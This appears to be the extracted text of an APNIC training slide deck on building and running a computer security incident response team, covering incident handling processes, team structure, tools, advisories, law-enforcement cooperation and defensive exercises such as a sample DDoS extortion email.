– Prevent recurrence
– Prevent Further Abuse
34
34. Exercise-1
• You might have an incident already
• Visit www.zone-h.com/archive
• Enable filters
– Insert domain
• Let’s Discuss
– What can we learn from this?
– What is the risk for publication of defaced websites?
– Going back to our formula: Risk = Threats + Vulnerabilities
35
35. Exercise-1: Discussion
• Detection
– How do I know about incidents affecting me
• Analysis
– How ‘bad’ is the situation
– Google for ZeusTracker, MalwareDomainList
• Recover
– How do I fix this
• Lessons Learned
– How can we prevent this happening in the future
– Think PPT!
– Can series of action be co-ordinated?
36
36. Whois Database IRT Object
• IRT - Incident Response Team
• Reporting of network abuse can be directed to specialized
teams such as Incident Response Teams (IRTs)
• Implemented in AP region by policy Prop-079 in November
2010.
– Mandatory for inetnum, inet6num and aut-num, objects created and
updated in whois database
• In essence, the contact information must be reachable and
can do something about an incident!
37
38. What is incident?
• ITIL terminology defines an incident as:
– Any event which is not part of the standard operation of a service and
which causes, or may cause, an interruption to, or a reduction in, the
quality of that service
• ISO27001 defines an incident as:
– any event which is not part of the standard operation of a service and
which causes or may cause an interruption to, or a reduction in, the
quality of that service.
39
39. Incident Response vs. Incident Handling?
• Incident Response is all of the technical components
required in order to analyze and contain an incident.
– Skills: requires strong networking, log analysis, and forensics skills.
• Incident Handling is the logistics, communications,
coordination, and planning functions needed in order to
resolve an incident in a calm and efficient manner.
[isc.sans.org]
40
40. What is Event?
• An “event” is any observable occurrence in a system and/or
network
• Not all events are incidents but all incidents are events
41
41. Objective of Incident Response
• To mitigate or reduce risks associated to an incident
• To respond to all incidents and suspected incidents
based on pre-determined process
• Provide unbiased investigations on all incidents
• Establish a 24x7 hotline/contact – to enable
effective reporting of incidents.
• Control and contain an incident
– Affected systems return to normal operation
– Recommend solutions – short term and long term solutions
42
42. Dealing with Incidents – Bottom Line
• What happens if you don’t deal with incidents?
– Become Tomorrow’s Headline (Image)
– I or Domain Blacklisted (Availability & Financial Loss)
• Linked to Criminals
• The World needs you!
– Trusted point of contact (information on infected or compromised hosts
– Doing your bit to keep the Internet a safe and secure place for
everyone!
43
43. The CSIRT Organisation
• Defining the CSIRT Organisation
• Mission Statement
– High level definition of what the team will do
• Constituency
– Whose incidents are we going to be handling or responsible for
– And to what extent
• CSIRT position / location in the Organisation
• Relation to other teams (or organisations)
44
44. Possible Activities of CSIRTs
• Incident Handling
• Alerts & Warnings
• Vulnerability Handling
• Artefact Handling
• Announcements
• Technology Watch
• Audits/Assessments
• Configure and Maintain Tools/
Applications/Infrastructure
• Security Tool Development
• Intrusion Detection
• Information Dissemination
• Risk Analysis
• Business Continuity Planning
• Security Consulting
• Awareness Building
• Education/Training
• Product Evaluation
List from CERT-CC (www.cert.org/csirts/)
45
45. Operations & Availability
• Incidents don’t happen on a particular day or time
• How to ensure 24 x7 reachability?
– IRT Object In WHOIS Database
– Email (Mailing List)
– Phone, SMSes
– Information on the Website
– Relationship with National CSIRTs and Others Relevant
Organisations
• ISPS, Vendors, Law Enforcement Agencies
46
46. Different kinds of CSIRTs
• The type of activities, focus and capabilities may be
different
• Some examples
– National CSIRTs
– Vendor CSIRTs
– (Network & Content) Providers Teams
47
47. Resources Consideration (1)
• People, Process and Technology Requirements
• People
– Resources for:
• Handling Incidents Reports (Dedicated?)
• Technical Analysis & Investigation
– What kinds of skills are required ?
• Familiarity with technology
• Familiarity with different types of security incidents
• Non Technical skills – Communication, Writing
• Trustworthiness
48
48. Resources Requirements (2)
• Process & Procedures
– Generally from the beginning of incident till when we resolve the
incident
– Including lessons learned & improvement of current policies or
procedures
– Must be clear so that people know what do to
– Importance
• Specific Procedures for Handling Specific types of Incidents
– Malware Related
– DDoS
– Web Defacement
– Fraud
– Data Breach
49
50. Applying the Framework -
Responding to a DDOS Incident
1. Preparation
2. Identification
3. Containment
4. Remediation
5. Recovery
6. Aftermath/Lessons Learned
51
Reference: cert.societegenerale.com/resources/files/IRM-4-DDoS.pdf
51. Example Team Structure
• First Level
– Helpdesk, Perform Triage
• 2nd Level
– Specialists
• Network Forensics
• Malware Specialists
• Web Security Specialists
• Overall Co-ordination
52
52. Understanding Role of Others in the
Organisation
• Different roles in the organisations
– CEO: to maximise shareholder value
– PR officer: to present a good image to the press
– Corporate Risk: to care about liabilities, good accounting, etc.
– CSIRT: to prevent and resolve incidents
• Don’t assume these interests automatically coincide - but
with your help, they can !
53
54. Resources Requirements
• Technology / Tools
• Essentially 2 parts
– For handling Incidents & Incidents Related Artifacts
• Managing tickets, secure communications, etc
• RTIR, OTRS, AIRT are some good examples
– Tools & Resources for Analysis & Investigation
• Depending on the type of work that is required
• For performing:
– Hosts Analysis, Log Analysis, Traffic Analysis, Network
Monitoring, Forensics, Malware Analysis
– Tools that support standards for exchanging Threat Intels
with other teams (STIX & TAXII)
55
56. Phish Response Checklist
1. Analyse / Report of Spam
2. Phishing Site Take Down
– Removal / Suspension
– Browser Notification
3. Phishing Site Analysis
– Phishkits ?
4. Credentials ‘Stolen’
– Notify Users
5. Report / Escalation
6. Lessons Learned
57
57. Advisories and Alerts
• Scenarios that potentially require Advisory or Alert
– Incident that could potential have a wide-scale impact
– Examples
• Declaration by attacker to launch attack
• Critical vulnerability of ‘popular’ software in the constituency
• Some types of Incidents Require action by those in your
consituencies
– They have to apply the patch themselves
– Their network or systems are not reachable to you
– They must perform additional risk assessment
– Perform check so that to ensure that they are not vulnerable
58
58. Advisories and Alerts (2)
• Content
– Should be clear & concise
• What is impacted
• If fix available or workaround
– Shouldn’t be confusing
– Guide on how to determine or apply fix could be useful
• Distribution of advisory and alerts
– Preparation of targeted list based on industry, common systems,
groups
– Using suitable platforms to reach out (including media)
– Goal is to reach out as quick as possible the right
• Special Programs with Vendors
– Early alert – i.e. Microsoft
59
59. Working with Law Enforcement
Agencies & Judiciary Sector
• Some incidents have elements of crime
– ‘Cyber’ or non-cyber laws
– Regulatory framework
• Implication
– Must work with Law Enforcement Agency (must notify)
– Preservation of digital evidence (logs, images, etc)
• Proper configuration of systems, time etc
– Working together with LEAs to investigate
• Monitoring, recording and tracking
• Responding to requests
• Training and Cyber Security Exercises can help to create
awareness
60
60. Collaboration & Information Sharing
• Bad guys work together, Good guys should too!
• Make yourself known, establish trust, collaborate and learn from
others
• Association of CSIRTS
– National CSIRTs groups (in some countries)
– Regional – APCERT, OIC-CERT, TF-CSIRT
– Global – FIRST.org
• Closed & Trusted Security Groups
– NSP-SEC
– OPS-TRUST
• Getting Feeds about your constituencies (and sharing with them)
– ShadowServer Foundation
– Team Cymru
– Honeynet Project
61
61. Getting Involved
• Global Take Downs / Co-ordinated Response
– DNSChanger Working Group
– Conficker Working Group
• Cyber Security Exercises
– Multiple Teams & Multiple Scenarios activities
– Getting to know your peers and improving internal processes as
capabilities
– Example: APCERT Drill, ASEAN Drill, etc
• Helping Promote Best Practices & Awareness
– Source Address Validation (BCP 38)
– APWG Stop – Think – Connect (APWG.org)
62
62. Collaboration & Co-operation
• Check out some of the security organisations mentioned
earlier
– APCERT – http://www.apcert.org
– FIRST – http://www.first.org
– ShadowServer Foundation http://www.shadowserver.org
– Team Cymru - https://www.team-cymru.org/Services/
– Honeynet Project – http://www.honeynet.org
63
63. Managing CSIRT
• Having sufficient resources is critical to maintain cert / csirt
operation
• Consider having funds for traveling to participate in
workshops, training and meetings
64
65. About this Module
• This module covers some publicly available tools that can
be used for managing incident reports and performing
(initial) analysis
• Depending on the nature of the incident, different sets of
tools will have to be used by the incident responder
• It is by no means comprehensive but useful to gain initial
insights when handling an incident
66
66. Managing Incident Reports
• There may be multiple ways to contact a CERT / CSIRT
– Email, Web Form, Fax, Security Systems
– Should ensure that reports (tickets) are attended to
• Workflow System for managing abuse reports and artifacts
– Web-based system
– Reflect policies for incident response / handling activities
– Artifacts: Logs, executables
– Generate reports for review and lessons learned
• Some Solutions:
– RTIR: RT for Incident Response http://bestpractical.com/rtir/
– OTRS: https://www.otrs.com/software/open-source/
67
68. Spam and Web Defacement
• Spam Header Analysis
– http://mxtoolbox.com/Public/Tools/EmailHeaders.aspx
• Zone-H Defacement Archive
– http://www.zone-h.com
69
69. Whois Database & Passive DNS
• The whois database is an indispensable tool for incident
handling.
• RIR’s whois database gives information about a network i.e.
who is the point contact
• But we need historical data on who use to own it
– May show something suspicious
• Passive DNS:
– http://www.bfk.de/bfk_dnslogger.html
70
70. Abuse Information about your
Network
• There are multiple initiatives on the Internet that could be of use
to gain information about abuses or potential abuses on your
network
1. Abuse.ch – Zeus, SpyEye, Palevo, Feodo malware Tracker i.e.
http://zeustracker.abuse.ch
2. Malware Domain List
– http://www.malwaredomainlist.com/
– http://www.malwaredomains.com/
3. Open DNS Resolvers
– http://openresolverproject.org/
71
71. Secure Communication Tools
• Best Practice to have use GnuPG/PGP for communication
– For signing and/or encrypting messages
– Extremely useful for information sharing (especially on need to know
basis)
• Keys that belong to others (teams or individuals) are
published on public PGP key servers
– http://pgp.mit.edu
• ‘Key-signing’ parties are common at CSIRT meetings or
gathering
72
73. Exercise – 1
• Defining your CERT/CSIRT based on RFC2350
– RFC2350 - Expectations for Computer Security Incident Response
– https://www.rfc-editor.org/rfc/rfc2350.txt
74
74. Exercise 2 – From .RU (or somewhere)
with Love
75
Date: Day, Month 2011
Subject: Partnership
From: Attacker
To: Victim
Your site does not work because We attack your site.
When your company will pay to us we will stop attack.
Contact the director. Do not lose clients.
75. Exercise 3 – Writing a Security
Advisory
• Information about critical vulnerability affecting a popular
application.
• Write a security advisory to your constituent explaining the
situation and action required of them
76
76. Recap
• We have covered
– The bigger picture – Managing Risks and Cyber Security
– The need to respond to incidents
– Setting up Security Response Teams
• Defining the Team & Team Structure
• Resources required
• Policies, SOPs, SLAs
• Tools for incident handlers
• Making yourself known and working with others
• Keep Calm & Incident Response!
77
78. APNIC Survey 2014
• 11 -22 June 2014
• Opportunity to provide input on APNIC’s performance,
development, and future direction
• Contributes to APNIC’s future planning processes
• Run by an impartial, independent research organization
• Confidentiality of respondents guaranteed
79
survey.apnic.net